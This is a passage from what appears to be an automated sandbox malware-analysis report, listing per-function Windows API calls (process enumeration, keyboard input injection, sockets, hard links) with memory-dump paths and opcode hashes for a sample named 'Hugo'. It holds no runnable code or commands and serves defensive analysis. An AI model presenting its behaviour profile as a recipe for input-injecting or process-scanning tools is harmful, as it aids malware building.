                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7E02BBBD226309FF77256208C84FA932246F11704B150565E802E2111EB20CD44BE55
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 4ca0208092c906023c58685a9eb87fca37012efac3cfc0d63e5fb639efcf31cb
                                                                                                                                                                                                              • Instruction ID: 7afc9496bd8c6391dfa0b676062e53f39515fd1bb2f1201b3deb28343ec56eb3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ca0208092c906023c58685a9eb87fca37012efac3cfc0d63e5fb639efcf31cb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65C17D75A0021AEFDB05CF98C884EAEB7B5FF88714F108199E409DB251DB30EE41EB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                              • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                              • Instruction ID: 190fa0af24f39236e100d31bb24542e5541f7cc6c563263033226bd38b507acc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5A14772D007869FEB11CF28C8917BEBFE4EF11320F2441A9ED95AB291D278A941E750
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00FB0BD4,?), ref: 00F70EE0
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00FB0BD4,?), ref: 00F70EF8
                                                                                                                                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,00FADCE0,000000FF,?,00000000,00000800,00000000,?,00FB0BD4,?), ref: 00F70F1D
                                                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 00F70F3E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 314563124-0
                                                                                                                                                                                                              • Opcode ID: 078467d340538240a0ed1945270e1f87531296227ab2b06c75f88f88a3708299
                                                                                                                                                                                                              • Instruction ID: 901ed09e3826dda5ebad2131649c0b60541be9c323b62bbd1f95c33d4429b854
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 078467d340538240a0ed1945270e1f87531296227ab2b06c75f88f88a3708299
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A813A71A00109EFCB14DF94C884EEEB7B9FF89315F208559F506AB250DB71AE06DB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00F9B10C
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00F9B11A
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00F9B1FC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00F9B20B
                                                                                                                                                                                                                • Part of subcall function 00F2E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00F54D73,?), ref: 00F2E395
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1991900642-0
                                                                                                                                                                                                              • Opcode ID: 70ef6fc7b6390500aa0b05bf026437f8c0e0fb9be82dd475095a30d4d14461b5
                                                                                                                                                                                                              • Instruction ID: 5ac87248d0cc9a098c10d4ff1e3415f4e789d1862a6ef7a8629c6b1a1ebb31cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70ef6fc7b6390500aa0b05bf026437f8c0e0fb9be82dd475095a30d4d14461b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1518BB1908301AFD710EF24DC86A9BBBE8FF88754F40491DF88997251EB34D944DB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                              • Opcode ID: 3f697234787d16f267f842d9fab062193d949ced96fc1dbaab3e769b1191a757
                                                                                                                                                                                                              • Instruction ID: 22837c77b11057968e80ad9236ba00b3913f0a01cb9fb32777eabc1627e32e0d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f697234787d16f267f842d9fab062193d949ced96fc1dbaab3e769b1191a757
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97413932E00100ABDB307BBD9C82B7E3AA4FF46733F140625FE18D6191DA796809B361
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00F9255A
                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00F92568
                                                                                                                                                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F925E7
                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00F925F1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$socket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1881357543-0
                                                                                                                                                                                                              • Opcode ID: 9e535154d6deb43a40a46984d06b950f3ba496fb00d0778de3779f9ed41a9191
                                                                                                                                                                                                              • Instruction ID: 3defd8095f3315208746888ebe349ec6116b9e7f4d1b7f773659f4e1257d3b6c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e535154d6deb43a40a46984d06b950f3ba496fb00d0778de3779f9ed41a9191
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF41F474A40200AFE720AF24DC86F6A37E4AB44768F54C44CF91A8F6D2C775ED42DB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00FA6D1A
                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00FA6D4D
                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00FA6DBA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3880355969-0
                                                                                                                                                                                                              • Opcode ID: 6c9ce3e0d8eec15dd66b8eb5d222037366569b61a6877ce8a7ea5719f2cf277c
                                                                                                                                                                                                              • Instruction ID: 61795fb59a540a9dba37ff038f9c8f36d74b95bdd342989d556d77d12c0a3dab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c9ce3e0d8eec15dd66b8eb5d222037366569b61a6877ce8a7ea5719f2cf277c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD512DB4A00209EFCF24DF64D8809AE7BB6FF56364F148559F915DB290DB30AD81EB50
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: bc0793235f6d2c681194bf534a6a1ae85241eda89ad55189480bdf079a66865e
                                                                                                                                                                                                              • Instruction ID: bc037c3ca766ec3c097e6487f17b113f06ece6cb81835a404cd8533fb9436f44
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc0793235f6d2c681194bf534a6a1ae85241eda89ad55189480bdf079a66865e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D410A71A00704AFE725AF78CC41B6A7FEDEF84720F10852AF911DB292D775D9159780
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F861C8
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00F861EE
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F86213
                                                                                                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F8623F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3321077145-0
                                                                                                                                                                                                              • Opcode ID: 76b0f90b534822132e061994f0d974143bd1d82667f27e5a869f792c48d7ae10
                                                                                                                                                                                                              • Instruction ID: 59a8db52e9a70440c7dd291f710a004ac7d58c2ed1ccda34fc6ecb5fb2875a2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76b0f90b534822132e061994f0d974143bd1d82667f27e5a869f792c48d7ae10
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4414135600610DFCF11EF55C945A9DBBE2EF89720B188488E84A9B362CB34FD41EB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00F7B473
                                                                                                                                                                                                              • SetKeyboardState.USER32(00000080), ref: 00F7B48F
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00F7B4FD
                                                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00F7B54F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 432972143-0
                                                                                                                                                                                                              • Opcode ID: 43f2ff37492f41cefd4b786e718030800cf1746a67e09a53414265d213535be5
                                                                                                                                                                                                              • Instruction ID: 9cd69d573f7a216840f0b07d8d9f2941925c1b7c935058c37f5bb038fed08aa3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43f2ff37492f41cefd4b786e718030800cf1746a67e09a53414265d213535be5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B310871E402086EFF31CF259C05BFA7BB5AB4A320F08C21BF49A961D6C7748945A763
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00F7B5B8
                                                                                                                                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F7B5D4
                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F7B63B
                                                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00F7B68D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 432972143-0
                                                                                                                                                                                                              • Opcode ID: 95e6a1317e9029cf21183b365135e578d6d326f88897bebd137cebf3671d036f
                                                                                                                                                                                                              • Instruction ID: e7bf49d47446446d977c52d5da22b6c5b7a020adb39a5bfd586fca90fff3d89c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95e6a1317e9029cf21183b365135e578d6d326f88897bebd137cebf3671d036f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C31E970D4060C6EFF208B658C057FE7BA6AF86320F08C26BE589561D1C7748A55ABA3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 00FA80D4
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00FA814A
                                                                                                                                                                                                              • PtInRect.USER32(?,?,?), ref: 00FA815A
                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 00FA81C6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1352109105-0
                                                                                                                                                                                                              • Opcode ID: b67a4451ebc3205418501d32041314d4c6159b7c106f07c8a83806f4b6af640c
                                                                                                                                                                                                              • Instruction ID: e19a895bc8e5411b99aa193568ff7292c9369959226802569f3daf766d3a301c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b67a4451ebc3205418501d32041314d4c6159b7c106f07c8a83806f4b6af640c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F419EB4A00259DFCB11CF58C884AA9BBF5FF46364F1440A8E9559B261DBB0E843EB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00FA2187
                                                                                                                                                                                                                • Part of subcall function 00F74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F743AD
                                                                                                                                                                                                                • Part of subcall function 00F74393: GetCurrentThreadId.KERNEL32 ref: 00F743B4
                                                                                                                                                                                                                • Part of subcall function 00F74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F72F00), ref: 00F743BB
                                                                                                                                                                                                              • GetCaretPos.USER32(?), ref: 00FA219B
                                                                                                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 00FA21E8
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00FA21EE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2759813231-0
                                                                                                                                                                                                              • Opcode ID: 42391c1fcfa107d0a582db3e570178931908874cc1618db83aa9a2f8555bcdf5
                                                                                                                                                                                                              • Instruction ID: cbfbe171d16abe141294e7ac825b078deff114fd01c9f92a8ac96a39d7710ed0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42391c1fcfa107d0a582db3e570178931908874cc1618db83aa9a2f8555bcdf5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 133141B1E00209AFD704EFA9CC81CEEB7F8EF49304B54846AE415E7211DB759E45DBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F141EA: _wcslen.LIBCMT ref: 00F141EF
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F7E8E2
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F7E8F9
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F7E924
                                                                                                                                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00F7E92F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3763101759-0
                                                                                                                                                                                                              • Opcode ID: 03c7725995f1d49f9beb265b75c60058be4d3affb913f22128e66f8ddccc9c8a
                                                                                                                                                                                                              • Instruction ID: 4351eea432ef7de8f83d8f8c6f56309d5fba26c1427b96386bd3b1d19fde8f50
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03c7725995f1d49f9beb265b75c60058be4d3affb913f22128e66f8ddccc9c8a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB21FE72D00214EFCB10AF64DD81BAEB7F4EF45360F104096F908BB241D674AD41D7A2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00FA9A5D
